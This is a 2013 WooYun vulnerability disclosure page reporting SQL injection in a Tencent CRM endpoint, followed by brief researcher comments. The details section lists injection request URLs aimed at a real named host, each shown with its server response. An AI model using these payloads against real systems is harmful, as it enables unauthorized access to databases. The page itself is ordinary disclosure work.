当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017424

漏洞标题:腾讯某CRM系统存在SQL注射可能得到系统数据

相关厂商:腾讯客户

漏洞作者: 路人甲

提交时间:2013-01-17 12:57

修复时间:2013-03-03 12:58

公开时间:2013-03-03 12:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-03-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

腾讯某被广泛使用的CRM系统(客户管理系统)存在明显SQL注射,可得到系统数据,请及时整改

详细说明:

http://crm2.qq.com/cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='1

JSONP_CALLBACK_3({"numRet":{"r":0,"kfuin":938041585,"nameAccount":"4000252578","envId":12},"taRet":{"r":0,"sid":null},"env":null})


http://crm2.qq.com/cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='2

JSONP_CALLBACK_3({"numRet":{"r":1,"kfuin":"4000252578'and'1'='2","nameAccount":"4000252578","envId":null},"taRet":{"r":0,"sid":null},"env":null})


http://crm2.qq.com/cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'or%20version()%3E1%23

JSONP_CALLBACK_3({"numRet":{"r":0,"kfuin":938067669,"nameAccount":"8000654755","envId":5000},"taRet":{"r":0,"sid":null},"env":null})


漏洞证明:

害怕南山法院不敢

修复方案:

自己解决

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2013-01-17 13:45 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    路过,看看。

  2. 2013-01-17 14:03 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    前排强势插入,广告位出租,此广告长期有效。。

  3. 2013-01-17 14:17 | lion(lp) ( 普通白帽子 | Rank:115 漏洞数:14 | 本人菜。。。千年实习白帽子)

    跟着路过

  4. 2013-01-17 16:24 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    楼下保持队伍

  5. 2013-01-17 16:42 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    神奇的路人甲~

  6. 2013-01-17 21:05 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    报告洞主,已关注